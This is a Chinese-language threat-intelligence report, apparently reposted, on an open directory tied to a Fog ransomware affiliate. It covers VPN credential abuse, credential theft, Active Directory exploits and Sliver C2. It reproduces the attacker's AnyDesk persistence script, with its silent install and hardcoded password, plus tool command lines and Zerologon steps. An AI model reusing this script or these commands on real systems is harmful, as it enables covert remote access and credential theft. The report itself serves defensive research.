穿越迷雾Navigating Through The Fog

admin 2025年5月6日17:03:13穿越迷雾Navigating Through The Fog已关闭评论2 views字数 5259阅读17分31秒阅读模式

关键要点

  • • 2024 年 12 月发现了一个与勒索软件附属公司相关的开放目录,可能与 Fog 勒索软件组织有关。它包含用于侦察、利用、横向移动和持久性的工具和脚本。
  • • 初始访问权限是使用泄露的 SonicWall VPN 凭据获得的,而其他攻击性工具则为凭据盗窃、利用 Active Directory 漏洞和横向移动提供了便利。
  • • 持久性通过 AnyDesk 维护,由预配置远程访问凭证的 PowerShell 脚本自动实现。
  • • Sliver C2 可执行文件托管在服务器上,用于命令和控制作,以及 Proxychains 隧道。
  • • 受害者横跨欧洲、北美和南美的多个行业,包括技术、教育和物流,凸显了该附属公司的广泛目标范围。

摘要

DFIR 报告的威胁情报小组在 2024 年 12 月发现了一个开放目录,托管在 194.48.154.79:80。该目录可能与与 Fog 组织相关的勒索软件运营商有关,该组织于 2024 年年中首次观察到。对其内容的分析揭示了一个用于侦察、利用、凭证盗窃和命令和控制活动的综合工具包。

这些工具包括用于利用 VPN 凭据的 SonicWall Scanner、用于提取受 Windows DPAPI 保护的凭据的 DonPAPI、用于滥用 Active Directory 证书服务 (AD CS) 的 Certipy、Zer0dump 和用于利用 CVE-2020-1472 等 Active Directory 漏洞的 Pachine/noPac。

该附属公司还通过自动化 PowerShell 脚本利用 AnyDesk 实现持久性,并在服务器上托管 Sliver C2 组件来管理植入物。Proxychains 和 Powercat 用于促进隐蔽的横向移动和反向外壳。目录中发现的受害者数据表明,受害者的目标涉及多个行业,包括技术、教育和物流,地理重点是意大利、希腊、巴西和美国。

基于钻石模型的情报分析

攻击者

DFIR 报告的威胁情报小组基于Fog 勒索软件组织的目录浏览漏洞服务器,评估本次攻击情报的等级为中风险,依据如下:

  • • 受害者在开放目录中被入侵的证据,后来出现在 Fog Ransomware 的专用泄漏站点 (DLS) 上
  • • VirusTotal 情报社区也对相关IP有所标记

在通过
fofa.info
检索的已保存的开放目录内容中,有一个名为
ouroverde.net.br
的文件夹,该文件夹是攻击者的受害者。

穿越迷雾Navigating Through The Fog
" 
             target="_blank" 
             style="color: #576b95; text-decoration: none;">
            http://www.w3.org/TR/html4/strict.dtd">
          <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Directory listing for /</title></head><body><h1>Directory listing for /</h1><hr><ul><li><a href=".bash_history">.bash_history</a></li><li><a href=".bashrc">.bashrc</a></li><li><a href=".cache/">.cache/</a></li><li><a href=".config/">.config/</a></li><li><a href=".gnupg/">.gnupg/</a></li><li><a href=".local/">.local/</a></li><li><a href=".nxc/">.nxc/</a></li><li><a href=".profile">.profile</a></li><li><a href=".sliver/">.sliver/</a></li><li><a href=".sliver-client/">.sliver-client/</a></li><li><a href=".ssh/">.ssh/</a></li><li><a href=".wget-hsts">.wget-hsts</a></li><li><a href=".Xauthority">.Xauthority</a></li>
  • .xorgxrdp.10.log
  • " target="_blank" style="color: #576b95; text-decoration: none;"> xorgxrdp.10.log">.xorgxrdp.10.log
    <li><a href=".xsession-errors">.xsession-errors</a></li>
  • 20241121150831_Certipy.zip
  • " target="_blank" style="color: #576b95; text-decoration: none;"> 20241121150831_Certipy.zip">20241121150831_Certipy.zip
  • any.ps1
  • " target="_blank" style="color: #576b95; text-decoration: none;"> any.ps1">any.ps1
  • AnyDesk.exe
  • " target="_blank" style="color: #576b95; text-decoration: none;"> AnyDesk.exe">AnyDesk.exe
    <li><a href="Certipy/">Certipy/</a></li><li><a href="Desktop/">Desktop/</a></li><li><a href="Documents/">Documents/</a></li>
  • DonPAPI-1.0.0/
  • " target="_blank" style="color: #576b95; text-decoration: none;"> DonPAPI-1.0.0/">DonPAPI-1.0.0/
    <li><a href="Downloads/">Downloads/</a></li><li><a href="Music/">Music/</a></li><li><a href="noPac/">noPac/</a></li><li><a href="orpheus/">orpheus/</a></li>
  • ouroverde.net.br/
  • " target="_blank" style="color: #576b95; text-decoration: none;"> ouroverde.net.br/">ouroverde.net.br/
    <li><a href="Pachine/">Pachine/</a></li><li><a href="Pictures/">Pictures/</a></li>
  • powercat.ps1
  • " target="_blank" style="color: #576b95; text-decoration: none;"> powercat.ps1">powercat.ps1
    <li><a href="Public/">Public/</a></li><li><a href="sliver-client_linux">sliver-client_linux</a></li>
  • sliver-client_linux.sig
  • " target="_blank" style="color: #576b95; text-decoration: none;"> sliver-client_linux.sig">sliver-client_linux.sig
    <li><a href="sliver-server">sliver-server</a></li>
  • sliver-server_linux.sig
  • " target="_blank" style="color: #576b95; text-decoration: none;"> sliver-server_linux.sig">sliver-server_linux.sig
  • slv.bin
  • " target="_blank" style="color: #576b95; text-decoration: none;"> slv.bin">slv.bin
    <li><a href="snap/">snap/</a></li><li><a href="sonic_scan/">sonic_scan/</a></li>
  • sonic_scan.zip
  • " target="_blank" style="color: #576b95; text-decoration: none;"> sonic_scan.zip">sonic_scan.zip
    <li><a href="Templates/">Templates/</a></li><li><a href="thinclient_drives/">thinclient_drives/</a></li>
  • v1.0.0.zip
  • " target="_blank" style="color: #576b95; text-decoration: none;"> v1.0.0.zip">v1.0.0.zip
    <li><a href="Videos/">Videos/</a></li><li><a href="zer0dump/">zer0dump/</a></li></ul><hr></body></html>

    该公司列在 Fog 的数据泄露站点中,如下图所示。

    穿越迷雾Navigating Through The Fog

    主机的 bash 历史记录中提到了“
    fourlis.net”的内部域名,这表明攻击者已成功入侵该网络。

    穿越迷雾Navigating Through The Fog

    虽然这个特定的受害者没有出现在数据泄露网站上,但在同一时期发布了一篇文章

    穿越迷雾Navigating Through The Fog

    在 VirusTotal 的评论部分,一位用户提到该服务器被用作C2服务器,也可能用于数据泄露。

    穿越迷雾Navigating Through The Fog

    基础设施

    Sliver: 攻击者利用服务器托管 Sliver C2,如 ThreatFox 中列出的文件,并基于驻留在 open-directory 中的文件。

    穿越迷雾Navigating Through The Fog

    DFIR 威胁情报小组于 2024 年 12 月 11 日观察到该服务器托管 Sliver Team 服务器端口 31337,但在第一次看到后没有再次出现。

    在非常短的时间内,另一个 Sliver C2 部署在同一个 ASN 中,即 AS62240,该 ASN 由托管服务提供商 Clouvider 拥有。同一攻击者可能从同一提供商处购买了多台服务器来部署其命令和控制服务器。但是,没有找到托管提供商和 C2 框架之外的其他链接。

    穿越迷雾Navigating Through The Fog

    技战法

    边界突破

    有效账户

    SonicWall 扫描仪: 服务器包含一个名为
    sonic_scan.zip
    的 ZIP 文件,其中包含一个 Python 脚本和一个文件
    data.txt,其中包含可能泄露的
    VPN 凭证,其结构如下:

    • • Target IP Address 目标 IP 地址
    • • Username 用户名
    • • Password 密码
    • • Domain Name 域名
    • • VPN Software VPN 软件
    穿越迷雾Navigating Through The Fog

    攻击者利用脚本 sonic_scan/
    main.py
    登陆 SonicWall VPN 设备进行身份验证并执行端口扫描:

    • • Reads and parses
      data.txt
      to get the IP address, username, password and domain name (if any) of the target appliance.
    • • 读取和解析
      data.txt
      以获取目标设备的 IP 地址、用户名、密码和域名(如果有)。
    • • For every entry in
      data.txt,
      which represents a potential valid account, obtains the domain name associated with the specific IP address and then executes the NetExtender process to login into the target VPN. NetExtender is a SonicWall command-line utility which allows access a VPN server. Specifically, NetExtender is executed via this command-line: netextender –username –password –domain –always-trust .
    • • 对于
      data.txt
      中的每个条目(代表一个潜在的有效帐户),获取与特定 IP 地址关联的域名,然后执行 NetExtender 进程以登录到目标 VPN。NetExtender 是一个 SonicWall 命令行实用程序,允许访问 VPN 服务器。具体来说,NetExtender 通过以下命令行执行:netextender < 目标 IP 地址> –用户名< 目标用户名> –密码< 用户名 password> –域< 目标域名> –always-trust。
    • • After the execution of NetExtender, the script parses the output produced by the VPN and, if the connection was successful, a loop is initiated until the string “NetExtender connected successfully” is found. During this loop, IP addresses are extracted and appended to a list which is then provided to Nmap for port scanning.
    • • 执行 NetExtender 后,该脚本将解析 VPN 生成的输出,如果连接成功,则启动一个循环,直到找到字符串“NetExtender connected successfully”。在此循环期间,提取 IP 地址并附加到一个列表中,然后提供给 Nmap 进行端口扫描。
    • • Once the Nmap scan is completed, the NetExtender process is terminated.
    • • Nmap 扫描完成后,NetExtender 进程将终止。
    穿越迷雾Navigating Through The Fog

    Arctic Wolf 还将使用受损的 SonicWall 凭据与 Fog 勒索软件联系起来。

    横向移动

    远程服务:SMB/Windows 管理员共享

    NetExec 的:NetExec 是从 CrackMapExec 演变而来的后漏洞利用工具。它具有用于远程命令执行、网络枚举和权限提升的多种特性和功能。

    穿越迷雾Navigating Through The Fog
    穿越迷雾Navigating Through The Fog

    权限维持

    创建或修改系统进程:Windows 服务

    AnyDesk: 为了在受感染的 Windows 主机上建立持久性,攻击者利用著名的远程监控和管理 (RMM) 工具 AnyDesk。PowerShell 脚本 “
    any.ps1”
    自动下载和安装 AnyDesk,包括设置密码 
    Admin#123 以访问 RMM。

    Function AnyDesk {mkdir "C:\ProgramData\AnyDesk"# Download AnyDesk$clnt = new-object 
                System.Net.WebClient
              $url = "
                http://download.anydesk.com/AnyDesk.exe"
              $file = "C:\ProgramData\
                AnyDesk.exe"
              $
                clnt.DownloadFile($url,$file)
              # powershell mkdir "C:\ProgramData\AnyDesk"# powershell -command "(new-object 
                System.Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.exe',
               'C:\ProgramData\
                AnyDesk.exe')"
              
                cmd.exe
               /c C:\ProgramData\
                AnyDesk.exe
               --install C:\ProgramData\AnyDesk --start-with-win --silent
                cmd.exe
               /c echo Admin#123 | C:\ProgramData\
                anydesk.exe
               --set-password
                cmd.exe
               /c C:\ProgramData\
                AnyDesk.exe
               --get-id}


    lolrmm.io
     中详细介绍了 AnyDesk 的全面描述和所有可能的检测技术。

    凭证访问

    来自密码存储的凭据

    DonPAPI & Impacket dpapi:DonPAPI 提供了从受感染的 Windows 系统中查找和检索受 Windows 数据保护 API (DPAPI) 保护的凭据的功能,例如:

    • • Chromium 浏览器凭据、Cookie 和令牌。
    • • Firefox 浏览器凭据和 Cookie。
    • • Windows 证书。
    • • 凭据管理器。
    • • 文件库凭证。

    .bash_history 显示攻击者使用以下命令行选项使用 DonPAPI:

    • • -pvk .pvk: 指定用于解密受 DPAPI 保护的凭据的私钥文件 (PVK)。
    • • –no_vnc: 禁用 VNC 凭证的收集。
    • • –no_remoteops: 禁止从远程系统收集凭证。
    • • –GetHashes: 启用 NTLM 哈希的集合。
    • • –no_recent: 禁用最近使用的文件和文档的收集
    • • –no_sysadmins: 将系统管理员排除在凭证收集过程中
    • • -o : 将输出保存到特定文件夹中。
    穿越迷雾Navigating Through The Fog

    攻击者还使用 Impacket 套件中的
    dpapi.py
    来检索域备份密钥。

    穿越迷雾Navigating Through The Fog
    穿越迷雾Navigating Through The Fog

    窃取或伪造身份验证证书

    Certipy:Certipy 是一种基于 Python 的工具,用于创建用于与 Active Directory 证书服务 (AD CS) 交互,专门用于枚举、识别和利用易受攻击的证书模板,最终目的是模拟高特权帐户。

    下图显示了攻击者如何启动查找功能来检测易受攻击的 AD CS 模板。

    穿越迷雾Navigating Through The Fog

    窃取或伪造 Kerberos 票证:Kerberoasting

    Orpheus:Orpheus 是 Trustedsec 基于 Impacket 的
    GetUserSPNs.py

    kerberosv5.py
    设计的攻击性 Python 工具。该工具采用防御规避机制构建,因为它将加密类型从 Kerberoasting 攻击中常见的 RC4 (eType 23) 更改为合法流量中常见的 AES-256 (eType 18)。

    根据可用的 .bash_history 文件,攻击者只下载了该工具。

    穿越迷雾Navigating Through The Fog

    权限提升

    利用权限提升

    zer0dump 中:Zer0dump 是针对 Zerologon 漏洞 (CVE-2020-1472) 的概念验证 (PoC) 漏洞。该工具允许未修补的域控制器入侵,以获得 Active Directory 环境中的域管理员权限。

    穿越迷雾Navigating Through The Fog

    Zerologon 利用是通过以下步骤进行的:

    • • 利用 Netlogon 的 AES-CFB8 实现中的加密漏洞,该漏洞允许攻击者通过发送 ClientCredential 字段填充为零的 Netlogon 消息来绕过身份验证。
    • • 将域控制器的计算机帐户密码重置为空字符串,从而有效地授予对域的管理访问权限。
    • • 与 Impacket 的
      secretsdump.py
      集成,以从受感染的域控制器中提取凭据。
    • • 利用漏洞后,zer0dump 会尝试恢复原来的机器账号密码。

    Pachine & noPac:Pachine 和 noPac 是为利用 CVE-2021-42278CVE-2021-42287 漏洞而开发的攻击性工具,允许在 Active Directory 中进行权限升级。他们利用 Kerberos 特权属性证书 (PAC) 从标准域帐户开始可能模拟域管理员。

    Pachine 的扫描选项枚举域控制器以确定它是否容易受到 CVE-2021-42278 的攻击。

    穿越迷雾Navigating Through The Fog
    穿越迷雾Navigating Through The Fog

    要利用前面提到的漏洞,noPac 需要有效的域帐户凭据,这些凭据被滥用来获取可用于危害域管理员的 Kerberos 票证。

    下图显示了使用 noPac 模拟域管理员管理员。

    穿越迷雾Navigating Through The Fog

    这两个工具之间的主要区别在于:

    • • Pachine 添加计算机帐户并获取特定 SPN 的 TGS。
    • • NoPac 还提供了删除 shell 和转储哈希的功能。

    远程控制

    代理

    Proxychains:Proxychains 是一种用于通过代理服务器路由网络流量的工具,它支持 SOCKS4、SOCKS5 和 HTTPS 等多种类型的代理。代理链可以与开发后框架(例如 Sliver、Cobalt Strike 等)结合使用,以通过植入程序路由流量。

    下图显示了攻击者如何利用代理链将 Python 脚本(如 certipy 或
    noPac.py)从命令和控制服务器执行到目标环境中。

    穿越迷雾Navigating Through The Fog

    下图显示了 proxychains 的工作原理。该工具非常强大,因为攻击者可以从命令和控制服务器执行工具,与在受监控系统上运行可能留下的工件相比,留下的足迹更少。

    穿越迷雾Navigating Through The Fog

    应用层协议:Web 协议

    Sliver: 开放目录中存在两个与 Sliver 关联的二进制文件:
    slv.bin
    和 sliver-client_linux。我们还在基础设施部分注意到,此 IP 地址曾经被视为 Sliver C2。

    由于 shellcode 已加密,因此无法分析
    slv.bin
    并从 shellcode 中获取更多信息。很可能,它被用来连接回同一个 Sliver 服务器。二进制 sliver-client_linux 是用于连接到 Sliver 服务器的可执行文件,但没有观察到 Sliver 的进一步使用。

    协议隧道

    Powercat: 主机上存在一个名为
    powercat.ps1
    的 Powercat 副本。Powercat 是一种基于 PowerShell 的网络工具,旨在复制 Netcat 提供的功能。它可用于:

    • • 网络通信,因为它同时支持 TCP 和 UDP 连接。
    • • 绑定和反向 shell 创建以侦听传入连接或连接回命令和控制服务器。
    • • 通过 TCP、UDP 和 DNS (dnscat2) 传输数据,这对于规避网络检测机制很有用。
    • • 有效负载生成和编码。
    • • 流量隧道,用于连接到否则无法访问的系统。
    穿越迷雾Navigating Through The Fog

    攻击目标

    国家

    穿越迷雾Navigating Through The Fog

    在文件
    data.txt
    中找到的所有 IP 地址(存在于 ZIP 文件
    sonic_scan.zip)都位于意大利,并与
    AS5602 Retelit Digital Services
    S.p.A.
    相关联,这是一家提供 IT 和网络安全服务的公司。其他受害者位于以下国家/地区:

    • • 希腊
    • • 美国
    • • 巴西

    行业受攻击者影响的行业如下:

    • • 科技
    • • 教育
    • • 零售
    • • 运输与物流

    钻石模型

    穿越迷雾Navigating Through The Fog

    MITRE ATT&CK

    穿越迷雾Navigating Through The Fog

    免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
    • 左青龙
    • 微信扫一扫
    • weinxin
    • 右白虎
    • 微信扫一扫
    • weinxin
    admin
    • 本文由 发表于 2025年5月6日17:03:13
    • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                     穿越迷雾Navigating Through The Foghttps://cn-sec.com/archives/4030913.html
                    免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.